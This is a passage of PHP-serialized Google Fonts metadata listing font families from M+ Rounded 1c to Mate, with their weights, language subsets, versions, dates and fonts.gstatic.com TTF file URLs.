1c\";s:8:\"variants\";a:7:{i:0;s:3:\"100\";i:1;s:3:\"300\";i:2;s:7:\"regular\";i:3;s:3:\"500\";i:4;s:3:\"700\";i:5;s:3:\"800\";i:6;s:3:\"900\";}s:7:\"subsets\";a:9:{i:0;s:8:\"cyrillic\";i:1;s:12:\"cyrillic-ext\";i:2;s:5:\"greek\";i:3;s:9:\"greek-ext\";i:4;s:6:\"hebrew\";i:5;s:8:\"japanese\";i:6;s:5:\"latin\";i:7;s:9:\"latin-ext\";i:8;s:10:\"vietnamese\";}s:7:\"version\";s:3:\"v15\";s:12:\"lastModified\";s:10:\"2022-04-26\";s:5:\"files\";O:8:\"stdClass\":7:{s:3:\"100\";s:93:\"http://fonts.gstatic.com/s/mplusrounded1c/v15/VdGCAYIAV6gnpUpoWwNkYvrugw9RuM3ixLsg6-av1x0.ttf\";s:3:\"300\";s:94:\"http://fonts.gstatic.com/s/mplusrounded1c/v15/VdGBAYIAV6gnpUpoWwNkYvrugw9RuM0q5psKxeqmzgRK.ttf\";s:7:\"regular\";s:90:\"http://fonts.gstatic.com/s/mplusrounded1c/v15/VdGEAYIAV6gnpUpoWwNkYvrugw9RuPWGzr8C7vav.ttf\";s:3:\"500\";s:94:\"http://fonts.gstatic.com/s/mplusrounded1c/v15/VdGBAYIAV6gnpUpoWwNkYvrugw9RuM1y55sKxeqmzgRK.ttf\";s:3:\"700\";s:94:\"http://fonts.gstatic.com/s/mplusrounded1c/v15/VdGBAYIAV6gnpUpoWwNkYvrugw9RuM064ZsKxeqmzgRK.ttf\";s:3:\"800\";s:94:\"http://fonts.gstatic.com/s/mplusrounded1c/v15/VdGBAYIAV6gnpUpoWwNkYvrugw9RuM0m4psKxeqmzgRK.ttf\";s:3:\"900\";s:94:\"http://fonts.gstatic.com/s/mplusrounded1c/v15/VdGBAYIAV6gnpUpoWwNkYvrugw9RuM0C45sKxeqmzgRK.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:701;O:8:\"stdClass\":8:{s:6:\"family\";s:13:\"Ma Shan Zheng\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:18:\"chinese-simplified\";i:1;s:5:\"latin\";}s:7:\"version\";s:3:\"v10\";s:12:\"lastModified\";s:10:\"2022-04-26\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:82:\"http://fonts.gstatic.com/s/mashanzheng/v10/NaPecZTRCLxvwo41b4gvzkXaRMTsDIRSfr0.ttf\";}s:8:\"category\";s:11:\"handwriting\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:702;O:8:\"stdClass\":8:{s:6:\"family\";s:7:\"Macondo\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v21\";s:12:\"lastModified\";s:10:\"2022-04-26\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:70:\"http://fonts.gstatic.com/s/macondo/v21/RrQQboN9-iB1IXmOS2XO0LBBd4Y.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:703;O:8:\"stdClass\":8:{s:6:\"family\";s:18:\"Macondo Swash Caps\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v20\";s:12:\"lastModified\";s:10:\"2022-04-26\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:94:\"http://fonts.gstatic.com/s/macondoswashcaps/v20/6NUL8EaAJgGKZA7lpt941Z9s6ZYgDq6Oekoa_mm5bA.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:704;O:8:\"stdClass\":8:{s:6:\"family\";s:4:\"Mada\";s:8:\"variants\";a:7:{i:0;s:3:\"200\";i:1;s:3:\"300\";i:2;s:7:\"regular\";i:3;s:3:\"500\";i:4;s:3:\"600\";i:5;s:3:\"700\";i:6;s:3:\"900\";}s:7:\"subsets\";a:2:{i:0;s:6:\"arabic\";i:1;s:5:\"latin\";}s:7:\"version\";s:3:\"v16\";s:12:\"lastModified\";s:10:\"2022-04-26\";s:5:\"files\";O:8:\"stdClass\":7:{s:3:\"200\";s:67:\"http://fonts.gstatic.com/s/mada/v16/7Au_p_0qnzeSdf3nCCL8zkwMIFg.ttf\";s:3:\"300\";s:67:\"http://fonts.gstatic.com/s/mada/v16/7Au_p_0qnzeSdZnkCCL8zkwMIFg.ttf\";s:7:\"regular\";s:63:\"http://fonts.gstatic.com/s/mada/v16/7Auwp_0qnzeSTTXMLCrX0kU.ttf\";s:3:\"500\";s:67:\"http://fonts.gstatic.com/s/mada/v16/7Au_p_0qnzeSdcHlCCL8zkwMIFg.ttf\";s:3:\"600\";s:67:\"http://fonts.gstatic.com/s/mada/v16/7Au_p_0qnzeSde3iCCL8zkwMIFg.ttf\";s:3:\"700\";s:67:\"http://fonts.gstatic.com/s/mada/v16/7Au_p_0qnzeSdYnjCCL8zkwMIFg.ttf\";s:3:\"900\";s:67:\"http://fonts.gstatic.com/s/mada/v16/7Au_p_0qnzeSdbHhCCL8zkwMIFg.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:705;O:8:\"stdClass\":8:{s:6:\"family\";s:5:\"Magra\";s:8:\"variants\";a:2:{i:0;s:7:\"regular\";i:1;s:3:\"700\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v14\";s:12:\"lastModified\";s:10:\"2022-04-26\";s:5:\"files\";O:8:\"stdClass\":2:{s:7:\"regular\";s:65:\"http://fonts.gstatic.com/s/magra/v14/uK_94ruaZus72k5xIDMfO-ed.ttf\";s:3:\"700\";s:69:\"http://fonts.gstatic.com/s/magra/v14/uK_w4ruaZus72nbNDxcXEPuUX1ow.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:706;O:8:\"stdClass\":8:{s:6:\"family\";s:13:\"Maiden Orange\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v25\";s:12:\"lastModified\";s:10:\"2022-04-20\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:83:\"http://fonts.gstatic.com/s/maidenorange/v25/kJE1BuIX7AUmhi2V4m08kb1XjOZdCZS8FY8.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:707;O:8:\"stdClass\":8:{s:6:\"family\";s:7:\"Maitree\";s:8:\"variants\";a:6:{i:0;s:3:\"200\";i:1;s:3:\"300\";i:2;s:7:\"regular\";i:3;s:3:\"500\";i:4;s:3:\"600\";i:5;s:3:\"700\";}s:7:\"subsets\";a:4:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:4:\"thai\";i:3;s:10:\"vietnamese\";}s:7:\"version\";s:3:\"v10\";s:12:\"lastModified\";s:10:\"2022-04-26\";s:5:\"files\";O:8:\"stdClass\":6:{s:3:\"200\";s:74:\"http://fonts.gstatic.com/s/maitree/v10/MjQDmil5tffhpBrklhGNWJGovLdh6OE.ttf\";s:3:\"300\";s:74:\"http://fonts.gstatic.com/s/maitree/v10/MjQDmil5tffhpBrklnWOWJGovLdh6OE.ttf\";s:7:\"regular\";s:70:\"http://fonts.gstatic.com/s/maitree/v10/MjQGmil5tffhpBrkrtmmfJmDoL4.ttf\";s:3:\"500\";s:74:\"http://fonts.gstatic.com/s/maitree/v10/MjQDmil5tffhpBrkli2PWJGovLdh6OE.ttf\";s:3:\"600\";s:74:\"http://fonts.gstatic.com/s/maitree/v10/MjQDmil5tffhpBrklgGIWJGovLdh6OE.ttf\";s:3:\"700\";s:74:\"http://fonts.gstatic.com/s/maitree/v10/MjQDmil5tffhpBrklmWJWJGovLdh6OE.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:708;O:8:\"stdClass\":8:{s:6:\"family\";s:18:\"Major Mono Display\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:3:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:10:\"vietnamese\";}s:7:\"version\";s:3:\"v12\";s:12:\"lastModified\";s:10:\"2022-04-26\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:94:\"http://fonts.gstatic.com/s/majormonodisplay/v12/RWmVoLyb5fEqtsfBX9PDZIGr2tFubRhLCn2QIndPww.ttf\";}s:8:\"category\";s:9:\"monospace\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:709;O:8:\"stdClass\":8:{s:6:\"family\";s:4:\"Mako\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v18\";s:12:\"lastModified\";s:10:\"2022-04-26\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:63:\"http://fonts.gstatic.com/s/mako/v18/H4coBX6Mmc_Z0ST09g478Lo.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:710;O:8:\"stdClass\":8:{s:6:\"family\";s:4:\"Mali\";s:8:\"variants\";a:12:{i:0;s:3:\"200\";i:1;s:9:\"200italic\";i:2;s:3:\"300\";i:3;s:9:\"300italic\";i:4;s:7:\"regular\";i:5;s:6:\"italic\";i:6;s:3:\"500\";i:7;s:9:\"500italic\";i:8;s:3:\"600\";i:9;s:9:\"600italic\";i:10;s:3:\"700\";i:11;s:9:\"700italic\";}s:7:\"subsets\";a:4:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:4:\"thai\";i:3;s:10:\"vietnamese\";}s:7:\"version\";s:2:\"v9\";s:12:\"lastModified\";s:10:\"2022-04-26\";s:5:\"files\";O:8:\"stdClass\":12:{s:3:\"200\";s:66:\"http://fonts.gstatic.com/s/mali/v9/N0bV2SRONuN4QOLlKlRaJdbWgdY.ttf\";s:9:\"200italic\";s:69:\"http://fonts.gstatic.com/s/mali/v9/N0bX2SRONuN4SCj8wlVQIfTTkdbJYA.ttf\";s:3:\"300\";s:66:\"http://fonts.gstatic.com/s/mali/v9/N0bV2SRONuN4QIbmKlRaJdbWgdY.ttf\";s:9:\"300italic\";s:69:\"http://fonts.gstatic.com/s/mali/v9/N0bX2SRONuN4SCj8plZQIfTTkdbJYA.ttf\";s:7:\"regular\";s:62:\"http://fonts.gstatic.com/s/mali/v9/N0ba2SRONuN4eCrODlxxOd8.ttf\";s:6:\"italic\";s:65:\"http://fonts.gstatic.com/s/mali/v9/N0bU2SRONuN4SCjECn50Kd_PmA.ttf\";s:3:\"500\";s:66:\"http://fonts.gstatic.com/s/mali/v9/N0bV2SRONuN4QN7nKlRaJdbWgdY.ttf\";s:9:\"500italic\";s:69:\"http://fonts.gstatic.com/s/mali/v9/N0bX2SRONuN4SCj8_ldQIfTTkdbJYA.ttf\";s:3:\"600\";s:66:\"http://fonts.gstatic.com/s/mali/v9/N0bV2SRONuN4QPLgKlRaJdbWgdY.ttf\";s:9:\"600italic\";s:69:\"http://fonts.gstatic.com/s/mali/v9/N0bX2SRONuN4SCj80lBQIfTTkdbJYA.ttf\";s:3:\"700\";s:66:\"http://fonts.gstatic.com/s/mali/v9/N0bV2SRONuN4QJbhKlRaJdbWgdY.ttf\";s:9:\"700italic\";s:69:\"http://fonts.gstatic.com/s/mali/v9/N0bX2SRONuN4SCj8tlFQIfTTkdbJYA.ttf\";}s:8:\"category\";s:11:\"handwriting\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:711;O:8:\"stdClass\":8:{s:6:\"family\";s:8:\"Mallanna\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:6:\"telugu\";}s:7:\"version\";s:3:\"v13\";s:12:\"lastModified\";s:10:\"2022-04-26\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:72:\"http://fonts.gstatic.com/s/mallanna/v13/hv-Vlzx-KEQb84YaDGwzEzRwVvJ-.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:712;O:8:\"stdClass\":8:{s:6:\"family\";s:7:\"Mandali\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:6:\"telugu\";}s:7:\"version\";s:3:\"v14\";s:12:\"lastModified\";s:10:\"2022-04-26\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:70:\"http://fonts.gstatic.com/s/mandali/v14/LhWlMVbYOfASNfNUVFk1ZPdcKtA.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:713;O:8:\"stdClass\":8:{s:6:\"family\";s:7:\"Manjari\";s:8:\"variants\";a:3:{i:0;s:3:\"100\";i:1;s:7:\"regular\";i:2;s:3:\"700\";}s:7:\"subsets\";a:3:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:9:\"malayalam\";}s:7:\"version\";s:2:\"v9\";s:12:\"lastModified\";s:10:\"2022-04-26\";s:5:\"files\";O:8:\"stdClass\":3:{s:3:\"100\";s:72:\"http://fonts.gstatic.com/s/manjari/v9/k3kSo8UPMOBO2w1UdbroK2vFIaOV8A.ttf\";s:7:\"regular\";s:69:\"http://fonts.gstatic.com/s/manjari/v9/k3kQo8UPMOBO2w1UTd7iL0nAMaM.ttf\";s:3:\"700\";s:73:\"http://fonts.gstatic.com/s/manjari/v9/k3kVo8UPMOBO2w1UdWLNC0HrLaqM6Q4.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:714;O:8:\"stdClass\":8:{s:6:\"family\";s:7:\"Manrope\";s:8:\"variants\";a:7:{i:0;s:3:\"200\";i:1;s:3:\"300\";i:2;s:7:\"regular\";i:3;s:3:\"500\";i:4;s:3:\"600\";i:5;s:3:\"700\";i:6;s:3:\"800\";}s:7:\"subsets\";a:6:{i:0;s:8:\"cyrillic\";i:1;s:12:\"cyrillic-ext\";i:2;s:5:\"greek\";i:3;s:5:\"latin\";i:4;s:9:\"latin-ext\";i:5;s:10:\"vietnamese\";}s:7:\"version\";s:3:\"v13\";s:12:\"lastModified\";s:10:\"2022-07-12\";s:5:\"files\";O:8:\"stdClass\":7:{s:3:\"200\";s:87:\"http://fonts.gstatic.com/s/manrope/v13/xn7_YHE41ni1AdIRqAuZuw1Bx9mbZk59FO_F87jxeN7B.ttf\";s:3:\"300\";s:87:\"http://fonts.gstatic.com/s/manrope/v13/xn7_YHE41ni1AdIRqAuZuw1Bx9mbZk6jFO_F87jxeN7B.ttf\";s:7:\"regular\";s:87:\"http://fonts.gstatic.com/s/manrope/v13/xn7_YHE41ni1AdIRqAuZuw1Bx9mbZk79FO_F87jxeN7B.ttf\";s:3:\"500\";s:87:\"http://fonts.gstatic.com/s/manrope/v13/xn7_YHE41ni1AdIRqAuZuw1Bx9mbZk7PFO_F87jxeN7B.ttf\";s:3:\"600\";s:87:\"http://fonts.gstatic.com/s/manrope/v13/xn7_YHE41ni1AdIRqAuZuw1Bx9mbZk4jE-_F87jxeN7B.ttf\";s:3:\"700\";s:87:\"http://fonts.gstatic.com/s/manrope/v13/xn7_YHE41ni1AdIRqAuZuw1Bx9mbZk4aE-_F87jxeN7B.ttf\";s:3:\"800\";s:87:\"http://fonts.gstatic.com/s/manrope/v13/xn7_YHE41ni1AdIRqAuZuw1Bx9mbZk59E-_F87jxeN7B.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:715;O:8:\"stdClass\":8:{s:6:\"family\";s:8:\"Mansalva\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:2:\"v9\";s:12:\"lastModified\";s:10:\"2022-04-26\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:71:\"http://fonts.gstatic.com/s/mansalva/v9/aWB4m0aacbtDfvq5NJllI47vdyBg.ttf\";}s:8:\"category\";s:11:\"handwriting\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:716;O:8:\"stdClass\":8:{s:6:\"family\";s:7:\"Manuale\";s:8:\"variants\";a:12:{i:0;s:3:\"300\";i:1;s:7:\"regular\";i:2;s:3:\"500\";i:3;s:3:\"600\";i:4;s:3:\"700\";i:5;s:3:\"800\";i:6;s:9:\"300italic\";i:7;s:6:\"italic\";i:8;s:9:\"500italic\";i:9;s:9:\"600italic\";i:10;s:9:\"700italic\";i:11;s:9:\"800italic\";}s:7:\"subsets\";a:3:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:10:\"vietnamese\";}s:7:\"version\";s:3:\"v23\";s:12:\"lastModified\";s:10:\"2022-07-12\";s:5:\"files\";O:8:\"stdClass\":12:{s:3:\"300\";s:87:\"http://fonts.gstatic.com/s/manuale/v23/f0Xp0eas_8Z-TFZdHv3mMxFaSqASeeG6e7wD1TB_JHHY.ttf\";s:7:\"regular\";s:87:\"http://fonts.gstatic.com/s/manuale/v23/f0Xp0eas_8Z-TFZdHv3mMxFaSqASeeHke7wD1TB_JHHY.ttf\";s:3:\"500\";s:87:\"http://fonts.gstatic.com/s/manuale/v23/f0Xp0eas_8Z-TFZdHv3mMxFaSqASeeHWe7wD1TB_JHHY.ttf\";s:3:\"600\";s:87:\"http://fonts.gstatic.com/s/manuale/v23/f0Xp0eas_8Z-TFZdHv3mMxFaSqASeeE6fLwD1TB_JHHY.ttf\";s:3:\"700\";s:87:\"http://fonts.gstatic.com/s/manuale/v23/f0Xp0eas_8Z-TFZdHv3mMxFaSqASeeEDfLwD1TB_JHHY.ttf\";s:3:\"800\";s:87:\"http://fonts.gstatic.com/s/manuale/v23/f0Xp0eas_8Z-TFZdHv3mMxFaSqASeeFkfLwD1TB_JHHY.ttf\";s:9:\"300italic\";s:90:\"http://fonts.gstatic.com/s/manuale/v23/f0Xn0eas_8Z-TFZdNPTUzMkzITq8fvQsOApA3zRdIWHYr8M.ttf\";s:6:\"italic\";s:90:\"http://fonts.gstatic.com/s/manuale/v23/f0Xn0eas_8Z-TFZdNPTUzMkzITq8fvQsOFRA3zRdIWHYr8M.ttf\";s:9:\"500italic\";s:90:\"http://fonts.gstatic.com/s/manuale/v23/f0Xn0eas_8Z-TFZdNPTUzMkzITq8fvQsOGZA3zRdIWHYr8M.ttf\";s:9:\"600italic\";s:90:\"http://fonts.gstatic.com/s/manuale/v23/f0Xn0eas_8Z-TFZdNPTUzMkzITq8fvQsOIpH3zRdIWHYr8M.ttf\";s:9:\"700italic\";s:90:\"http://fonts.gstatic.com/s/manuale/v23/f0Xn0eas_8Z-TFZdNPTUzMkzITq8fvQsOLNH3zRdIWHYr8M.ttf\";s:9:\"800italic\";s:90:\"http://fonts.gstatic.com/s/manuale/v23/f0Xn0eas_8Z-TFZdNPTUzMkzITq8fvQsONRH3zRdIWHYr8M.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:717;O:8:\"stdClass\":8:{s:6:\"family\";s:9:\"Marcellus\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v13\";s:12:\"lastModified\";s:10:\"2022-04-26\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:75:\"http://fonts.gstatic.com/s/marcellus/v13/wEO_EBrOk8hQLDvIAF8FUfAL3EsHiA.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:718;O:8:\"stdClass\":8:{s:6:\"family\";s:12:\"Marcellus SC\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v13\";s:12:\"lastModified\";s:10:\"2022-04-26\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:81:\"http://fonts.gstatic.com/s/marcellussc/v13/ke8iOgUHP1dg-Rmi6RWjbLEPgdydGKikhA.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:719;O:8:\"stdClass\":8:{s:6:\"family\";s:12:\"Marck Script\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:3:{i:0;s:8:\"cyrillic\";i:1;s:5:\"latin\";i:2;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v16\";s:12:\"lastModified\";s:10:\"2022-04-26\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:81:\"http://fonts.gstatic.com/s/marckscript/v16/nwpTtK2oNgBA3Or78gapdwuCzyI-aMPF7Q.ttf\";}s:8:\"category\";s:11:\"handwriting\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:720;O:8:\"stdClass\":8:{s:6:\"family\";s:9:\"Margarine\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v21\";s:12:\"lastModified\";s:10:\"2022-04-26\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:75:\"http://fonts.gstatic.com/s/margarine/v21/qkBXXvoE6trLT9Y7YLye5JRLkAXbMQ.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:721;O:8:\"stdClass\":8:{s:6:\"family\";s:12:\"Markazi Text\";s:8:\"variants\";a:4:{i:0;s:7:\"regular\";i:1;s:3:\"500\";i:2;s:3:\"600\";i:3;s:3:\"700\";}s:7:\"subsets\";a:4:{i:0;s:6:\"arabic\";i:1;s:5:\"latin\";i:2;s:9:\"latin-ext\";i:3;s:10:\"vietnamese\";}s:7:\"version\";s:3:\"v22\";s:12:\"lastModified\";s:10:\"2022-07-12\";s:5:\"files\";O:8:\"stdClass\":4:{s:7:\"regular\";s:98:\"http://fonts.gstatic.com/s/markazitext/v22/sykh-ydym6AtQaiEtX7yhqb_rV1k_81ZVYYZtfSQT4MlBekmJLo.ttf\";s:3:\"500\";s:98:\"http://fonts.gstatic.com/s/markazitext/v22/sykh-ydym6AtQaiEtX7yhqb_rV1k_81ZVYYZtcaQT4MlBekmJLo.ttf\";s:3:\"600\";s:98:\"http://fonts.gstatic.com/s/markazitext/v22/sykh-ydym6AtQaiEtX7yhqb_rV1k_81ZVYYZtSqXT4MlBekmJLo.ttf\";s:3:\"700\";s:98:\"http://fonts.gstatic.com/s/markazitext/v22/sykh-ydym6AtQaiEtX7yhqb_rV1k_81ZVYYZtROXT4MlBekmJLo.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:722;O:8:\"stdClass\":8:{s:6:\"family\";s:9:\"Marko One\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v22\";s:12:\"lastModified\";s:10:\"2022-04-26\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:74:\"http://fonts.gstatic.com/s/markoone/v22/9Btq3DFG0cnVM5lw1haaKpUfrHPzUw.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:723;O:8:\"stdClass\":8:{s:6:\"family\";s:8:\"Marmelad\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:3:{i:0;s:8:\"cyrillic\";i:1;s:5:\"latin\";i:2;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v15\";s:12:\"lastModified\";s:10:\"2022-04-26\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:72:\"http://fonts.gstatic.com/s/marmelad/v15/Qw3eZQdSHj_jK2e-8tFLG-YMC0R8.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:724;O:8:\"stdClass\":8:{s:6:\"family\";s:6:\"Martel\";s:8:\"variants\";a:7:{i:0;s:3:\"200\";i:1;s:3:\"300\";i:2;s:7:\"regular\";i:3;s:3:\"600\";i:4;s:3:\"700\";i:5;s:3:\"800\";i:6;s:3:\"900\";}s:7:\"subsets\";a:3:{i:0;s:10:\"devanagari\";i:1;s:5:\"latin\";i:2;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v10\";s:12:\"lastModified\";s:10:\"2022-04-26\";s:5:\"files\";O:8:\"stdClass\":7:{s:3:\"200\";s:72:\"http://fonts.gstatic.com/s/martel/v10/PN_yRfK9oXHga0XVqekahRbX9vnDzw.ttf\";s:3:\"300\";s:72:\"http://fonts.gstatic.com/s/martel/v10/PN_yRfK9oXHga0XVzeoahRbX9vnDzw.ttf\";s:7:\"regular\";s:68:\"http://fonts.gstatic.com/s/martel/v10/PN_xRfK9oXHga0XtYcI-jT3L_w.ttf\";s:3:\"600\";s:72:\"http://fonts.gstatic.com/s/martel/v10/PN_yRfK9oXHga0XVuewahRbX9vnDzw.ttf\";s:3:\"700\";s:72:\"http://fonts.gstatic.com/s/martel/v10/PN_yRfK9oXHga0XV3e0ahRbX9vnDzw.ttf\";s:3:\"800\";s:72:\"http://fonts.gstatic.com/s/martel/v10/PN_yRfK9oXHga0XVwe4ahRbX9vnDzw.ttf\";s:3:\"900\";s:72:\"http://fonts.gstatic.com/s/martel/v10/PN_yRfK9oXHga0XV5e8ahRbX9vnDzw.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:725;O:8:\"stdClass\":8:{s:6:\"family\";s:11:\"Martel Sans\";s:8:\"variants\";a:7:{i:0;s:3:\"200\";i:1;s:3:\"300\";i:2;s:7:\"regular\";i:3;s:3:\"600\";i:4;s:3:\"700\";i:5;s:3:\"800\";i:6;s:3:\"900\";}s:7:\"subsets\";a:3:{i:0;s:10:\"devanagari\";i:1;s:5:\"latin\";i:2;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v12\";s:12:\"lastModified\";s:10:\"2022-04-26\";s:5:\"files\";O:8:\"stdClass\":7:{s:3:\"200\";s:82:\"http://fonts.gstatic.com/s/martelsans/v12/h0GxssGi7VdzDgKjM-4d8hAX5suHFUknqMxQ.ttf\";s:3:\"300\";s:82:\"http://fonts.gstatic.com/s/martelsans/v12/h0GxssGi7VdzDgKjM-4d8hBz5cuHFUknqMxQ.ttf\";s:7:\"regular\";s:78:\"http://fonts.gstatic.com/s/martelsans/v12/h0GsssGi7VdzDgKjM-4d8ijfze-PPlUu.ttf\";s:3:\"600\";s:82:\"http://fonts.gstatic.com/s/martelsans/v12/h0GxssGi7VdzDgKjM-4d8hAH48uHFUknqMxQ.ttf\";s:3:\"700\";s:82:\"http://fonts.gstatic.com/s/martelsans/v12/h0GxssGi7VdzDgKjM-4d8hBj4suHFUknqMxQ.ttf\";s:3:\"800\";s:82:\"http://fonts.gstatic.com/s/martelsans/v12/h0GxssGi7VdzDgKjM-4d8hB_4cuHFUknqMxQ.ttf\";s:3:\"900\";s:82:\"http://fonts.gstatic.com/s/martelsans/v12/h0GxssGi7VdzDgKjM-4d8hBb4MuHFUknqMxQ.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:726;O:8:\"stdClass\":8:{s:6:\"family\";s:6:\"Marvel\";s:8:\"variants\";a:4:{i:0;s:7:\"regular\";i:1;s:6:\"italic\";i:2;s:3:\"700\";i:3;s:9:\"700italic\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v14\";s:12:\"lastModified\";s:10:\"2022-04-26\";s:5:\"files\";O:8:\"stdClass\":4:{s:7:\"regular\";s:68:\"http://fonts.gstatic.com/s/marvel/v14/nwpVtKeoNgBV0qaIkV7ED366zg.ttf\";s:6:\"italic\";s:70:\"http://fonts.gstatic.com/s/marvel/v14/nwpXtKeoNgBV0qa4k1TALXuqzhA7.ttf\";s:3:\"700\";s:72:\"http://fonts.gstatic.com/s/marvel/v14/nwpWtKeoNgBV0qawLXHgB1WmxwkiYQ.ttf\";s:9:\"700italic\";s:74:\"http://fonts.gstatic.com/s/marvel/v14/nwpQtKeoNgBV0qa4k2x8Al-i5QwyYdrc.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:727;O:8:\"stdClass\":8:{s:6:\"family\";s:4:\"Mate\";s:8:\"variants\";a:2:{i:0;s:7:\"regular\";i:1;s:6:\"italic\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v14\";s:12:\"lastModified\";s:10:\"2022-04-26\";s:5:\"files\";O:8:\"stdClass\":2:{s:7:\"regular\";s:63:\"http://fonts.gstatic.com/s/mate/v14/m8JdjftRd7WZ2z28WoXSaLU.ttf\";s:6:\"italic\";s:66:\"http://fonts.gstatic.com/s/mate/v14/m8J